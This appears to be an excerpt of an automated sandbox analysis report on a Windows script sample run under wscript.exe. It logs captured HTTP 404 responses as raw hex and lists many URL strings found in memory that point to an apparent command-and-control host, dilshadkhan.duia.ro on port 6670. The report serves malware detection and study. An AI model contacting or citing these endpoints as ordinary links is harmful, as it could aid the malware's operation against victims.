d2 53 3d d6 83 29 36 bd 94 60 4a be 0a 09 74 5f 4b f3 70 74 87 33 ad ad 27 d3 c0 5c 10 fa 0a 06 e6 96 be 7c 59 7e 6a 69 8e af b5 27 12 30 ca 5a 44 02 c6 d3 d7 34 0d a2 85 39 4f e3 d5 ab 25 4e 5f c5 3e d1 c9 b4 95 98 5e 48 70 fa 23 f1 68 cb d2 2d 3d 30 f9 e8 0e cc 25 09 16 4b da d6 13 73 1e 84 e1 4f 64 4b 5b d8 04 a9 bf 6f d1 65 90 e9 a4 ad 5b ba d5 d6 03 93 c6 5f 62 8a 7f fe f1 bb 56 bb 3d 49 09 5d a7 11 3a 1f 2e 15 70 c9 74 3a ad c0 7e cc 1b e6 b5 08 e7 17 dd e5 14 17 56 ad 3d a1 66 96 7a 53 a2 53 d3 27 73 92 4e a9 c9 07 2e f0 ad f3 16 df 61 51 52 c7 c0 50 c1 e9 ec 8b fb 9f f0 e2 bf f1 8a b4 34 d0 99 5a fb 17 eb 37 68 35 89 fc 57 cb 20 f4 5b b4 fd 38 8f d3 56 3c fd 67 9a e2 fb 96 36 0f 31 48 17 97 a6 b6 4e cd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: public,max-age=3600x-litespeed-tag: 440_HTTP.404,440_404,440_URL.249cf122f2d92b3e82f0723a2e93dc1c,440_x-litespeed-cache: misstransfer-encoding: chunkeddate: Fri, 27 May 2022 15:30:11 GMTserver: LiteSpeedData Raw: 66 35 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 42 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 74 68 65 62 65 73 74 76 69 64 66 6f 72 61 6c 6c 2e 78 79 7a 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 42 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 68 65 62 65 73 74 76 69 64 66 6f 72 61 6c 6c 2e 78 79 7a 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 42 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 68 65 62 65 73 74 76 69 64 66 6f 72 61 6c 6c 2e 78 79 7a 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8x-litespeed-tag: 440_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 27 May 2022 15:30:11 GMTserver: LiteSpeedData Raw: 32 66 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 b6 92 e8 67 bb ea fc 07 0c 5d 19 4b 09 49 91 d4 9b b2 9c 3d 99 3c 36 5b c9 9e 54 26 d9 5b b7 92 d4 14 44 42 12 67 28 92 87 84 2c 39 8e ef 6f bf d5 78 f0 25 50 2f 8f 93 d4 ce 24 95 58 24 81 ee 46 a3 d1 dd 00 1a 8d 9b 17 5f fe eb d5 4f ff f7 87 af d0 92 ae c2 db cb 1b f8 83 42 1c 2d a6 1a 89 8c 9f 5f 6b f0 8e 60 ff f6 f2 e2 66 45 28 46 de 12 a7 19 a1 53 ed e7 9f be 36 46 1a ea e4 5f 22 bc 22 53 ed 2e 20 9b 24 4e a9 86 bc 38 a2 24 a2 53 6d 13 f8 74 39 f5 c9 5d e0 11 83 3d e8 28 88 02 1a e0 d0 c8 3c 1c 92 a9 cd e0 70 04 0c cc 75 1a cf 62 9a 5d e7 40 ae 57 78 6b 04 2b bc 20 46 92 12 40 e2 86 38 5d 90 6b 20 e0 86 06 34 24 b7 3f e0 05 41 51 4c d1 3c 5e 47 3e 7a 79 35 72 6c 7b 82 be bf 47 5f 84 f1 e2 a6 c3 4b 5d de 84 41 f4 0e a5 24 9c 5e fb 51 06 e0 e6 84 7a cb 6b b4 4c c9 7c 7a dd e9 d0 25 99 91 8c de 05 fe 3c 4e 71 18 9a db fb df 39 9e 43 35 33 73 63 c6 e9 a2 56 58 c3 21 25 69 84 29 d1 10 bd 4f c8 54 c3 49 12 06 1e a6 41 1c 75 d2 2c fb 6c bb 0a 35 c4 c8 9b 6a 82 5c f4 32 c5 ff 5e c7 13 f4 35 21 be c6 69 d3 96 94 26 ae 9a c0 ce 9c 10 bf c3 f9 98 93 f9 34 cc af e2 d5 8a 44 34 3b 9a 04 4f 54 28 d3 92 79 69 90 d0 db cb 4d 10 f9 f1 c6 7c b3 49 c8 2a 7e 1b bc 26 94 06 d1 22 43 53 f4 a0 cd 70 46 7e 4e 43 cd 65 0d cc dc 5f 3b bf 76 04 2b 7f ed b0 4e cf 7e ed 78 71 4a 7e ed b0 ca bf 76 ec 9e 69 99 d6 af 9d a1 b3 1d 3a bf 76 34 5d 23 5b aa b9 9a 99 44 0b 4d d7 b2 bb c5 79 f0 b2 bb 05 83 96 dd 2d be e2 00 b3 3b 06 30 5e a7 1e d1 dc 07 cd 8b 23 0f 53 46 86 a0 97 91 ab 92 99 5f 3b 9b c4 08 22 2f 5c fb 24 fb b5 f3 36 63 2f 58 55 23 25 21 c1 19 31 57 41 64 be cd 3e bf 23 e9 74 60 5a da e3 e3 e4 b2 f3 e9 0b f4 d3 32 c8 d0 3c 08 09 0a 32 84 d7 34 36 16 24 22 29 a6 c4 47 9f 76 2e 5f cc d7 91 07 d2 d3 22 3a d6 69 fb e1 0e a7 28 d2 53 3d d6 83 29 36 bd 94 60 4a be 0a 09 74 5f 4b f3 70 74 87 33 ad ad 27 d3 c0 5c 10 fa 0a 06 e6 96 be 7c 59 7e 6a 69 8e af b5 27 12 30 ca 5a 44 02 c6 d3 d7 34 0d a2 85 39 4f e3 d5 ab 25 4e 5f c5 3e d1 c9 b4 95 98 5e 48 70 fa 23 f1 68 cb d2 2d 3d 30 f9 e8 0e cc 25 09 16 4b da d6 13 73 1e 84 e1 4f 64 4b 5b d8 04 a9 bf 6f d1 65 90 e9 a4 ad 5b ba d5 d6 03 93 c6 5f 62 8a 7f fe f1 bb 56 bb 3d 49 09 5d a7 11 3a 1f 2e 15 70 c9 74 3a ad c0 7e cc 1b e6 b5 08 e7 17 dd e5 14 17 56 ad 3d a1 66 96 7a 53 a2 53 d3 27 73 92 4e a9 c9 07 2e f0 ad f3 16 df 61 51 52 c7 c0 50 c1 e9 ec 8b fb 9f f0 e2 bf f1 8a b4 34 d0 99 5a fb 17 eb 37 68 35 89 fc 57 cb 20 f4 5b b4 fd 38 8f d3 56 3c fd 67 9a e2 fb 96 36 0f 31 48 17 97 a6 b6 4e cd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:30:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:30:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:30:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro/
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro/sers
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro/tXPUBLIC=C:
Source: wscript.exe, 0000000F.00000002.790309780.0000023E30CBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.788499693.0000023E2EF22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.785750450.000000DCB1B92000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/
Source: wscript.exe, 00000006.00000003.309444184.000001A547DA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/)
Source: wscript.exe, 00000001.00000003.554186645.000001B742E19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710089935.000001B742E19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384727755.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.787143262.000001B742DEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.845175203.000001B745469000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384997666.000001B74540D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384691056.000001B7453AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.845140560.000001B745459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384897364.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554153165.000001B745468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714035079.000001B7453AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.801731870.000001B7453A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574260264.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573810530.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre
Source: wscript.exe, 00000001.00000003.710326547.000001B745435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre$
Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre$_&
Source: wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554153165.000001B745468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre%(
Source: wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554153165.000001B745468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre((
Source: wscript.exe, 00000006.00000003.574260264.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788120944.000001A547F90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.436255759.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573544181.000001A547F92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.757111866.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.436056290.000001A547F92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.435803969.000001A548020000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-
Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre._8
Source: wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre.duia.ro:6670/Vre
Source: wscript.exe, 00000001.00000003.554068672.000001B745435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554186645.000001B742E19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.712605938.000001B745460000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710326547.000001B745435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710089935.000001B742E19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.837496420.000001B745436000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714724265.000001B74541F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714465991.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.845175203.000001B745469000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554050285.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.712760640.000001B745457000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710577509.000001B745454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.808474712.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384997666.000001B74540D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384897364.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.553568378.000001B74544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384955138.000001B742E0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.801731870.000001B7453A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0
Source: wscript.exe, 0000000C.00000003.456045967.0000010D3844A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.456254408.0000010D3844F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.456298399.0000010D3845B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6
Source: wscript.exe, 00000006.00000002.787307667.000001A54611E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre1dG
Source: wscript.exe, 00000006.00000003.436368850.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre2a
Source: wscript.exe, 00000006.00000003.757128359.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.572232415.000001A548047000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574615041.000001A54800F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574519981.000001A54800C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574051437.000001A548051000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573367613.000001A54800B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.435803969.000001A548020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788220340.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.799686175.0000023E30EB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100
Source: wscript.exe, 0000000F.00000002.799686175.0000023E30EB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre7
Source: wscript.exe, 00000006.00000003.756744181.000001A548027000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.757322682.000001A548027000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre783C6-CB41-11D1-8B02-00600806D9B6
Source: wscript.exe, 0000000C.00000003.456284236.0000010D38441000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre?9
Source: wscript.exe, 0000000F.00000002.804301377.0000023E30F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreA2
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDENTIFIER=Intel64
Source: wscript.exe, 00000001.00000003.384997666.000001B74540D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384897364.000001B745406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreE-8C82-00AA004BA90B
Source: wscript.exe, 00000006.00000003.436368850.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreEa
Source: wscript.exe, 0000000F.00000002.799686175.0000023E30EB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreI
Source: wscript.exe, 00000006.00000003.436368850.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreIER=Intel64
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKTsNClZO
Source: wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574241305.000001A546126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574495089.000001A546128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.436100065.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788220340.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.615529127.0000010D35F31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.615417763.0000010D35F2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.614567898.0000023E2EF58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.616305170.0000023E2EF5B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM
Source: wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMTf
Source: wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMjo
Source: wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMrf_
Source: wscript.exe, 00000006.00000003.436056290.000001A547F92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreN
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi
Source: wscript.exe, 00000006.00000002.788393947.000001A54800C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreQa
Source: wscript.exe, 0000000F.00000002.804301377.0000023E30F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreV2
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreYXIgaXQg
Source: wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZ
Source: wscript.exe, 0000000C.00000003.456284236.0000010D38441000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZ6
Source: wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNlrr
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsN
